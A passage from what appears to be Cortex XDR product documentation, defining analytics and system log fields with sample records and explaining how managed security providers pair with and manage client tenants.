  System-wide unique message code.

friendlyName
  Descriptive log message name.

msgTextEn
  Description of the event, in English.

userFullName (endPointHeader)
  Full name of the Cortex XDR user.

userName (endPointHeader)
  Username associated with the Cortex XDR user.

userRole (endPointHeader)
  Role assigned to the Cortex XDR user.

userDomain (endPointHeader)
  Domain to which the user belongs.

agentTime
  Coordinated Universal Time (UTC) equivalent of the time at which an agent logged an event, in ISO-8601 string representation.

tzOffset
  Effective endpoint time zone offset from UTC, in minutes.

osType
  Operating system of the endpoint:
  • 1—Windows
  • 2—OS X/macOS
  • 3—Android
  • 4—Linux

isVdi
  Indicates whether the endpoint is a virtual desktop infrastructure (VDI) instance:
  • 0—The endpoint is not a VDI instance
  • 1—The endpoint is a VDI instance

osVersion
  Full version number of the operating system running on the endpoint. For example, 6.1.7601.19135.

is64
  Indicates whether the endpoint is running a 64-bit operating system:
  • 0—The endpoint is not running x64 architecture
  • 1—The endpoint is running x64 architecture

agentIp
  IP address of the endpoint.

deviceName
  Hostname of the endpoint on which the event was logged.

deviceDomain
  Domain to which the endpoint belongs.

agentVersion
  Version of the Cortex XDR agent.

contentVersion
  Content version in the local security policy.

protectionStatus
  Cortex XDR agent protection status:
  • 0—Protected
  • 1—OsVersionIncompatible
  • 2—AgentIncompatible

userFullName (messageData)
  Full name of the Cortex XDR user.

userName (messageData)
  Username associated with the Cortex XDR user.

userRole (messageData)
  Role assigned to the Cortex XDR user.

userDomain (messageData)
  Domain to which the user belongs.

messageName
  Name of the message.

messageId
  Unique numeric identifier of the message.

processStatus
  State of the process related to the event.

errorText
  If known, a description of the documented error.

errorData
  Parameters related to an event error.

resultData
  Parameters related to a successful event.

parameters
  Parameters supplied in the log message.

additionalData(Array)
  Additional information regarding event parameters.

loggedInUser
  User that is logged in to Cortex XDR.

Analytics Logs
Syslog format: recordType, class, FUTURE_USE, eventType, eventCategory, generatedTime, serverTime,
agentTime, tzOffset, FUTURE_USE, facility, customerId, trapsId, serverHost, serverComponentVersion,
regionId, isEndpoint, agentId, osType, isVdi, osVersion, is64, agentIp, deviceName, deviceDomain, severity,
agentVersion, contentVersion, protectionStatus, sha256, type, parentSha256, lastSeen, fileName, filePath,
fileSize, localAnalysisResult, reported, blocked, executionCount
Email body format example:

recordType: analytics
messageData/class: agent_data
messageData/subClass:
eventType: AgentTimelineEvent
messageData/eventCategory: hash
generatedTime: 2019-01-31T18:00:43Z
serverTime: 2019-01-31T18:59:46.586Z
endPointHeader/agentTime: 2019-01-31T18:00:43Z
endPointHeader/tzOffset: -480
product:
facility: TrapsAgent
customerId: 110044035
trapsId: 18520039498190352
serverHost: coreop-f-proda-mnmauto03930348053-311.proda.brz
serverComponentVersion: 2.0.9+564
regionId: 10
isEndpoint: 1
agentId: 3bcf7e5ff56e2891c78684a38b728e49
endPointHeader/osType: 2
endPointHeader/isVdi: 0
endPointHeader/osVersion: 10.12.6
endPointHeader/is64: 1
endPointHeader/agentIp: 192.168.0.21
endPointHeader/deviceName: Jeffreys-MacBook-Pro.local
endPointHeader/deviceDomain:
severity:
endPointHeader/agentVersion: 5.0.5.1193
endPointHeader/contentVersion: 42-6337
endPointHeader/protectionStatus: 0
messageData/sha256: 87e27ba9128d9c3b3d113c67623a06817a030b3bbb4d2871d1e6da9002206f26
messageData/type: macho
messageData/parentSha256:
messageData/lastSeen: 2019-01-31T18:00:43Z
messageData/fileName: crashpad_handler
messageData/filePath: /users/username/library/google/googlesoftwareupdate/googlesoftwareupdate.bundle/contents/macos/
messageData/fileSize: 353680
messageData/localAnalysisResult: "{""contentVersion"":""42-6337"",""result"":""Benign"",""trusted"":""None"",""publishers"":[""developer id application: google, inc. (eqhxz8m8av)""],""resultId"":0,""trustedId"":0}"
messageData/reported: 0
messageData/blocked: 0
messageData/executionCount: 4179

Field Name / Description

recordType
  Record type associated with the event and that you can use when managing logging quotas:
  • config—Cortex XDR administration and configuration changes.
  • system—Automated system management and agent reporting events.
  • analytics—Hourly hash execution report from the agent.
  • threats—Security events that occur on the endpoints.
  In this case, the record type is analytics.

class
  Class of Cortex XDR log: config, policy, system, and agent_log. The analytics sample above carries a class of agent_data.

eventType
  Subtype of event.

eventCategory
  Category of event, used internally for processing the flow of logs. Event categories vary by class:
  • config—deviceManagement, distributionManagement, securityEventManagement, systemManagement
  • policy—exceptionManagement, policyManagement, profileManagement, sam
  • system—licensing, provisioning, tenant, userAuthentication, workerProcessing
  • agent_log—agentFlow
  The analytics sample above carries an eventCategory of hash.

generatedTime
  Coordinated Universal Time (UTC) equivalent of the time at which an event was logged. For agent events, this represents the time on the endpoint. For policy, configuration, and system events, this represents the time on Cortex XDR, in ISO-8601 string representation (for example, 2017-01-24T09:08:59Z).

serverTime
  Coordinated Universal Time (UTC) equivalent of the time at which the server generated the log. If the log was generated on an endpoint, this field identifies the time the server received the log, in ISO-8601 string representation (for example, 2017-01-24T09:08:59Z).

agentTime
  Coordinated Universal Time (UTC) equivalent of the time at which an agent logged an event, in ISO-8601 string representation.

tzOffset
  Effective endpoint time zone offset from UTC, in minutes.

facility
  The Cortex XDR system component that initiated the event, for example: TrapsAgent, TrapsServiceCore, TrapsServiceManagement, and TrapsServiceBackend.

customerId
  The ID that uniquely identifies the Cortex Data Lake instance which received this log record.

trapsId
  Tenant external ID.

serverHost
  Hostname of Cortex XDR.

serverComponentVersion
  Software version of Cortex XDR.

regionId
  ID of Cortex XDR region:
  • 10—Americas (N. Virginia)
  • 70—EMEA (Frankfurt)

isEndpoint
  Indicates whether the event occurred on an endpoint:
  • 0—No, host is not an endpoint.
  • 1—Yes, host is an endpoint.

agentId
  Unique identifier for the Cortex XDR agent.

osType
  Operating system of the endpoint:
  • 1—Windows
  • 2—OS X/macOS
  • 3—Android
  • 4—Linux

isVdi
  Indicates whether the endpoint is a virtual desktop infrastructure (VDI) instance:
  • 0—The endpoint is not a VDI instance
  • 1—The endpoint is a VDI instance

osVersion
  Full version number of the operating system running on the endpoint. For example, 6.1.7601.19135.

is64
  Indicates whether the endpoint is running a 64-bit operating system:
  • 0—The endpoint is not running x64 architecture
  • 1—The endpoint is running x64 architecture

agentIp
  IP address of the endpoint.

deviceName
  Hostname of the endpoint on which the event was logged.

deviceDomain
  Domain to which the endpoint belongs.

severity
  Syslog severity level associated with the event:
  • 2—Critical. Used for events that require immediate attention.
  • 3—Error. Used for events that require special handling.
  • 4—Warning. Used for events that sometimes require special handling.
  • 5—Notice. Used for normal but significant events that can require attention.
  • 6—Informational. Informational events that do not require attention.
  Each event also has an associated Cortex XDR severity. See the messageData.trapsSeverity field for details.

agentVersion
  Version of the Cortex XDR agent.

contentVersion
  Content version in the local security policy.

protectionStatus
  Cortex XDR agent protection status:
  • 0—Protected
  • 1—OsVersionIncompatible
  • 2—AgentIncompatible

sha256
  SHA-256 hash of the file.

type
  Type of file (the email body sample above shows the type by name, macho):
  • 0—Unknown
  • 1—PE
  • 2—Mach-o
  • 3—DLL
  • 4—Office file (containing a macro)

parentSha256
  SHA-256 hash of the parent file.

lastSeen
  Coordinated Universal Time (UTC) equivalent of the time when the file last ran on an endpoint, in ISO-8601 string representation (for example, 2017-01-24T09:08:59Z).

fileName
  File name, without the path or the file type extension.

filePath
  Full path, aligned to the OS format.

fileSize
  Size of the file in bytes.

localAnalysisResult
  This object includes the content version, local analysis module version, verdict result, file signer, and trusted signer result. The trusted signer result (trustedId in the sample above) is an integer value:
  • 0—Cortex XDR did not evaluate the signer of the file.
  • 1—The signer is trusted.
  • 2—The signer is not trusted.

reported
  Reporting status of the file, as an integer value:
  • 0—Cortex XDR did not report the security event.
  • 1—Cortex XDR reported the security event.

blocked
  Blocking status of the file, as an integer value:
  • 0—Cortex XDR did not block the process or file.
  • 1—Cortex XDR blocked the process or file.

executionCount
  The total number of times a file identified by a specific hash was executed.
System Logs
Syslog format: recordType, class, FUTURE_USE, subClassId, eventType, eventCategory, generatedTime,
serverTime, FUTURE_USE, facility, customerId, trapsId, serverHost, serverComponentVersion, regionId,
isEndpoint, agentId, severity, trapsSeverity, messageCode, friendlyName, FUTURE_USE, msgTextEn,
userFullName, username, userRole, userDomain, agentTime, tzOffset, osType, isVdi, osVersion, is64,
agentIp, deviceName, deviceDomain, agentVersion, contentVersion, protectionStatus, userFullName,
username, userRole, userDomain, messageName, messageId, processStatus, errorText, errorData,
resultData, parameters, additionalData(Array)
Email body format example:

recordType: system
messageData/class: system
messageData/subClass: Provisioning
messageData/subClassId: 13
eventType: ServerLogPerTenant
messageData/eventCategory: tenant
generatedTime: 2019-01-31T18:15:19.000000+00:00
serverTime: 2019-01-31T18:15:19.000000+00:00
product:
facility: TrapsServerManagement
customerId: 004403511
trapsId: 18520498190303952
serverHost: 14917869646-201.proda.brz
serverComponentVersion: 2.0.9+624
regionId:
isEndpoint: 0
agentId:
severity: notice
messageData/trapsSeverity: informational
messageData/messageCode: 19015
messageData/friendlyName: User Login
messageData/msgTextLoc:
messageData/msgTextEn: User [email protected] has logged in with role superadmin
endPointHeader/userFullName:
endPointHeader/username:
endPointHeader/userRole:
endPointHeader/userDomain:
endPointHeader/agentTime:
endPointHeader/tzOffset:
endPointHeader/osType:
endPointHeader/isVdi:
endPointHeader/osVersion:
endPointHeader/is64:
endPointHeader/agentIp:
endPointHeader/deviceName:
endPointHeader/deviceDomain:
endPointHeader/agentVersion:
endPointHeader/contentVersion:
endPointHeader/protectionStatus:
messageData/userFullName:
messageData/username:
messageData/userRole:
messageData/userDomain:
messageData/messageName:
messageData/messageId:
messageData/processStatus:
messageData/errorText:
messageData/errorData:
messageData/resultData:
messageData/parameters:
messageData/additionalData: {}

Field Name / Description

recordType
  Record type associated with the event and that you can use when managing logging quotas. In this case, the record type is system, which includes logs related to automated system management and agent reporting events.

class
  Class of Cortex XDR log. System logs have a value of system.

subClass
  Subclass of event. Used to categorize logs in the Cortex XDR user interface.

subClassId
  Numeric representation of the subClass field for easy sorting and filtering.

eventType
  Subtype of event.

eventCategory
  Category of event, used internally for processing the flow of logs. Event categories vary by class:
  • config—deviceManagement, distributionManagement, securityEventManagement, systemManagement
  • policy—exceptionManagement, policyManagement, profileManagement, sam
  • system—licensing, provisioning, tenant, userAuthentication, workerProcessing
  • agent_log—agentFlow

generatedTime
  Coordinated Universal Time (UTC) equivalent of the time at which an event was logged. For agent events, this represents the time on the endpoint. For policy, configuration, and system events, this represents the time on Cortex XDR, in ISO-8601 string representation (for example, 2017-01-24T09:08:59Z).

serverTime
  Coordinated Universal Time (UTC) equivalent of the time at which the server generated the log. If the log was generated on an endpoint, this field identifies the time the server received the log, in ISO-8601 string representation (for example, 2017-01-24T09:08:59Z).

facility
  The Cortex XDR system component that initiated the event, for example: TrapsAgent, TrapsServiceCore, TrapsServiceManagement, and TrapsServiceBackend.

customerId
  The ID that uniquely identifies the Cortex Data Lake instance which received this log record.

trapsId
  Tenant external ID.

serverHost
  Hostname of Cortex XDR.

serverComponentVersion
  Software version of Cortex XDR.

regionId
  ID of Cortex XDR region:
  • 10—Americas (N. Virginia)
  • 70—EMEA (Frankfurt)

isEndpoint
  Indicates whether the event occurred on an endpoint:
  • 0—No, host is not an endpoint.
  • 1—Yes, host is an endpoint.

agentId
  Unique identifier for the Cortex XDR agent.

severity
  Syslog severity level associated with the event:
  • 2—Critical. Used for events that require immediate attention.
  • 3—Error. Used for events that require special handling.
  • 4—Warning. Used for events that sometimes require special handling.
  • 5—Notice. Used for normal but significant events that can require attention.
  • 6—Informational. Informational events that do not require attention.
  Each event also has an associated Cortex XDR severity. See the messageData.trapsSeverity field for details.

trapsSeverity
  Severity level associated with the event defined for Cortex XDR. Each of these severities corresponds to a syslog severity level:
  • 0—Informational. Informational messages that do not require attention. Identical to the syslog 6 (Informational) severity level.
  • 1—Low. Used for normal but significant events that can require attention. Corresponds to the syslog 5 (Notice) severity level.
  • 2—Medium. Used for events that sometimes require special handling. Corresponds to the syslog 4 (Warning) severity level.
  • 3—High. Used for events that require special handling. Corresponds to the syslog 3 (Error) severity level.
  • 4—Critical. Used for events that require immediate attention. Corresponds to the syslog 2 (Critical) severity level.
  See also the severity log field.

messageCode
  System-wide unique message code.

friendlyName
  Descriptive log message name.

msgTextEn
  Description of the event, in English.

userFullName (endPointHeader)
  Full name of the Cortex XDR user.

userName (endPointHeader)
  Username associated with the Cortex XDR user.

userRole (endPointHeader)
  Role assigned to the Cortex XDR user.

userDomain (endPointHeader)
  Domain to which the user belongs.

agentTime
  Coordinated Universal Time (UTC) equivalent of the time at which an agent logged an event, in ISO-8601 string representation.

tzOffset
  Effective endpoint time zone offset from UTC, in minutes.

osType
  Operating system of the endpoint:
  • 1—Windows
  • 2—OS X/macOS
  • 3—Android
  • 4—Linux

isVdi
  Indicates whether the endpoint is a virtual desktop infrastructure (VDI) instance:
  • 0—The endpoint is not a VDI instance
  • 1—The endpoint is a VDI instance

osVersion
  Full version number of the operating system running on the endpoint. For example, 6.1.7601.19135.

is64
  Indicates whether the endpoint is running a 64-bit operating system:
  • 0—The endpoint is not running x64 architecture
  • 1—The endpoint is running x64 architecture

agentIp
  IP address of the endpoint.

deviceName
  Hostname of the endpoint on which the event was logged.

deviceDomain
  Domain to which the endpoint belongs.

agentVersion
  Version of the Cortex XDR agent.

contentVersion
  Content version in the local security policy.

protectionStatus
  Cortex XDR agent protection status:
  • 0—Protected
  • 1—OsVersionIncompatible
  • 2—AgentIncompatible

userFullName (messageData)
  Full name of the Cortex XDR user.

userName (messageData)
  Username associated with the Cortex XDR user.

userRole (messageData)
  Role assigned to the Cortex XDR user.

userDomain (messageData)
  Domain to which the user belongs.

messageName
  Name of the message.

messageId
  Unique numeric identifier of the message.

processStatus
  State of the process related to the event.

errorText
  If known, a description of the documented error.

errorData
  Parameters related to an event error.

resultData
  Parameters related to a successful event.

parameters
  Parameters supplied in the log message.

additionalData(Array)
  Additional information regarding event parameters.

loggedInUser
  User that is logged in to Cortex XDR.



Managed Security
> About Managed Security
> Cortex XDR Managed Security Access Requirements
> Set up Managed Threat Hunting
> Pair a Parent Tenant with Child Tenant
> Manage a Child Tenant

About Managed Security
Cortex XDR supports pairing multiple Cortex XDR environments with a single interface enabling Managed
Security Services Providers (MSSP) and Managed Detection and Response (MDR) providers to easily
manage security on behalf of their clients.
Pairing an MSSP/MDR (parent) tenant with a client (child) tenant requires a separate Cortex XDR license
for the parent tenant. To ensure bidirectional tenant access between the parent and child, both need to
approve the pairing from within the Cortex XDR app.

Cortex XDR Managed Security Access Requirements
To set up a managed security pairing, you and your child tenants must activate the Cortex XDR app, provide
role permission, and define access configurations.
The following table describes what and where you and your child tenants need to define:

Tenant / Application / Action

Child
  Customer Support Portal (CSP) Account: Add the user name from the parent tenant who is initiating the parent-child pairing and ensure the user name has Super User role permissions.
  Hub: Provide the user name added in CSP with Admin role permissions to access the child Cortex XDR instance.

Parent
  Customer Support Portal (CSP) Account: Ensure the parent user name has Super User role permissions.
  Hub: Ensure the user name added to the child tenant's CSP account has Admin role permissions on the parent Cortex XDR instance.

Set up Managed Threat Hunting
Cortex XDR provides the Managed Threat Hunting service as an add-on security service. To use Cortex
XDR Managed Threat Hunting, you must purchase a Managed Threat Hunting license and have a Cortex
XDR Pro for Endpoint license with a minimum of 500 endpoints.
Managed Threat Hunting augments your security by providing 24/7, year-round monitoring by Palo
Alto Networks threat researchers and Unit 42 experts. The Managed Threat Hunting teams proactively
safeguard your organization and provide threat reports for critical security incidents and impact reports for
emerging threats that provide an analysis of exposure in your organization. In addition, the Managed Threat
Hunting team can identify incidents and provide in-depth review of related threat reports.
To get started with Managed Threat Hunting:

STEP 1 | Access the Cortex XDR app and approve the pairing request sent to your Cortex XDR tenant.
1. Navigate to and locate the Request for Pairing notification.
2. Select Approve and then Yes to confirm.
After the request is approved, Cortex XDR displays the Managed Threat Hunting label at the top of
the page.

STEP 2 | Configure notification emails for the impact reports and threat inquiries you want Cortex XDR
to send.
1. Select > Settings > Managed Threat Hunting.
2. Enter one or more email addresses to which you want to send reports and inquiries and ADD each
one.

3. Save your changes.

STEP 3 | (Optional) Forward Managed Threat Hunting alerts to external destinations such as email
or Slack from the > Settings > Notifications page.
This forwards both the alert itself and the detailed report in PDF format.

Pair a Parent Tenant with Child Tenant
After you and your child tenants have acquired the appropriate role permissions, you can pair your tenant
to your child tenants.

Pairing a Parent and Child Tenant


STEP 1 | From your Cortex XDR app, select > Settings > Tenant Management.
The Tenant Management table displays the:
• Tenant Name—Name of the child tenant
• Pairing Status—State of a pairing request: Paired, Pending, Failed, or Rejected
• Account Name—CSP account with which the child tenant is associated
• Last Sync—Timestamp of when the parent tenant last made contact with the child tenant
• Managed Security Actions—A column for each security action showing its status: either the name of the
assigned configuration or Unmanaged. Unmanaged means that a configuration for that security action has
not yet been selected.

STEP 2 | + Pair Tenant.

STEP 3 | In the Pair Tenant window, select the child tenant you want to pair. The drop-down only
displays child tenants you are allowed to pair with.
Child tenants are grouped according to:
• Unpaired—Children that have not yet been paired and are available. If another parent has requested
to pair with the child but the child has not yet agreed, the tenant will appear.
• Paired—Children that have already been paired to this parent.
• Paired with others—Children that have been paired with other parents.
• Pending—Children with a pending pairing request.

STEP 4 | Pair the tenant.


Cortex XDR sends a Request for Pairing to the specified child tenant.

STEP 5 | In the child tenant Cortex XDR console, a child tenant user with Admin role permissions needs
to approve the pairing by navigating to , locating the Request for Pairing notification, and
selecting Approve.

STEP 6 | Verify the parent-child pairing.


After pairing has been approved, in the child tenant’s Cortex XDR app, when navigating to a page
managed by a parent configuration, the child user is notified by a flag indicating who is managing their security:

In the child tenant, pages managed by you appear with a read-only banner. Child tenant users cannot
perform any actions from these pages, but can view the configurations you create on their behalf.

Unpairing a Parent and Child Tenant
When you want to discontinue the pairing with a child tenant, in the Tenant Management page, right-click
the tenant row and select Request Unpairing. For the unpairing to take effect, the child tenant must
approve the request.

When a child wants to unpair, the child user needs to navigate to and select Unpair.

Manage a Child Tenant
Pairing a child tenant enables you to view and investigate Cortex XDR data of a child tenant, and initiate
security actions on their behalf.
In your Cortex XDR, you have access to view the following pages:
• Incidents
• Alerts
• Query Builder
• Query Center and Results
• Causality View
• Timeline View
To initiate security actions on your child tenant, you need to create a Configuration. Security actions are
managed by configurations you create in the Cortex XDR app and then assign to each of the child tenants.
Each action requires its own configuration and allocation to a child tenant.
You can create configuration for the following actions:
• BIOC Rules
• Analytics BIOC Rules
• Exclusions
• Starred Alerts
• Profiles
The following sections describe how to manage your child tenants.
• Track your Tenant Management
• Investigate Child Tenant Data
• Create and Allocate Action Configurations
• Initiate a Security Managed Action

Track your Tenant Management


After successfully pairing your child tenant, navigate to > Settings > Tenant Management to view the
child tenant details.

The Tenant Management page displays the following information about each of your child tenants:

Field | Description
Status Indicator ( ) | Identifies whether the child tenant is connected.
TENANT ID | The Cortex Data Lake tenant ID.
TENANT NAME | Name you defined during the pairing process.
ACCOUNT ID | The CSP account ID.
ACCOUNT NAME | Name of the parent tenant.
PAIRING STATUS | Status of the child pairing process:
• Pending
• Paired
• Approved
• Declined
• Paired to another
• Not Paired
LAST SYNC | Timestamp of the last security action sync initiated by the parent tenant.
BIOC RULES & EXCEPTIONS | Name of the configuration managing the BIOC rules and exceptions actions.
STARRED INCIDENTS POLICY | Name of the configuration managing the starred incidents policy actions.
ALERT EXCLUSION | Name of the configuration managing the alert exclusion actions.
PROFILES | Name of the configuration managing the profile actions.

Investigate Child Tenant Data


With Cortex XDR managed security, you can investigate the Cortex XDR child tenant data.
By default, Cortex XDR displays data for your tenant. To display data for one or more of your child tenants,
select the tenants from the drop-down.

Some common tasks that you might perform include:

• Investigate Incidents on a child tenant.
• Investigate Alerts on a child tenant.
• Build and execute an XQL Search query to search across the data of a child tenant.
  When running an XQL Search, you can execute XQL queries across a single child tenant or up to 100
  child tenants simultaneously.
  • For XQL queries on a single child tenant, Cortex XDR provides the parent tenant with
    autocompletion and validation capabilities for all datasets available on the child tenant.
  • When executing XQL queries on multiple child tenants simultaneously:
    • Autocomplete and validation are only supported on Cortex XDR datasets, for example EDR
      data, Cortex XDR Alerts, and Palo Alto Networks next-generation firewall logs.
    • Queries are executed on each child tenant separately and return up to 1,000,000 results split
      across the selected tenants. For example, an XQL query on 10 tenants returns a maximum of
      100,000 results per tenant.
• Use the Query Builder to build and execute an entity-specific query across the data of a child tenant.
  You can run either an ad-hoc query or a scheduled query on one or more child tenants. For each query,
  Cortex XDR returns up to 100,000,000 results across all selected tenants.
• Use the Query Center to view previously run XQL searches and entity queries run on your tenant and
the child tenants.

Create and Allocate Configurations


To manage security actions on behalf of your child tenant, you need to first create and allocate an action
configuration.

STEP 1 | Navigate to each of the following Cortex XDR pages and follow the detailed steps:
• Rules > BIOC
• Rules > BIOC > Analytics BIOC Rules
• Rules > Rules Exceptions
• Investigation > Incident Management > Exclusions
• Investigation > Incident Management > Starred Alerts

STEP 2 | In the Configuration panel (1), + Create New (2) configuration.

STEP 3 | Enter the configuration Name and Description.

STEP 4 | Create.
The new configuration (3) appears in the Configuration pane.

STEP 5 | Navigate to Settings > Tenant Management.

STEP 6 | In the Tenant Management table, right-click a child tenant row and Edit Configurations.

STEP 7 | Assign the configuration you want to use to manage each of the security actions.

You can configure Profiles only as Managed or Unmanaged. All profiles you create are
automatically cloned to your child tenants.

STEP 8 | Update.
The Tenant Management table is updated with your assigned configurations.

Create a Security Managed Action


After you’ve created and assigned a configuration for each of your child tenant’s security actions, you can
define the specific managed action on behalf of the child tenant.

STEP 1 | Navigate to each of the following Cortex XDR pages:


• Rules > BIOC
• Rules > BIOC > Analytics BIOC Rules
• Rules > Rules Exceptions
• Investigation > Incident Management > Exclusions
• Investigation > Incident Management > Starred Alerts

STEP 2 | In the corresponding Configuration panel, select the action configuration you created and
allocated to your child tenant.
The corresponding security action Table displays the actions managing the child tenant.

STEP 3 | Depending on the security action, select:
• + Add BIOC to create a BIOC Rule.
• + New Exception to create a BIOC Exception.
• + Add Exclusion to create an Alert Exclusion.
• + Add Starring Configuration to create a starred alert inclusion.
• + New Profile to create a new endpoint profile.

Profiles you create are automatically cloned to your child tenants.
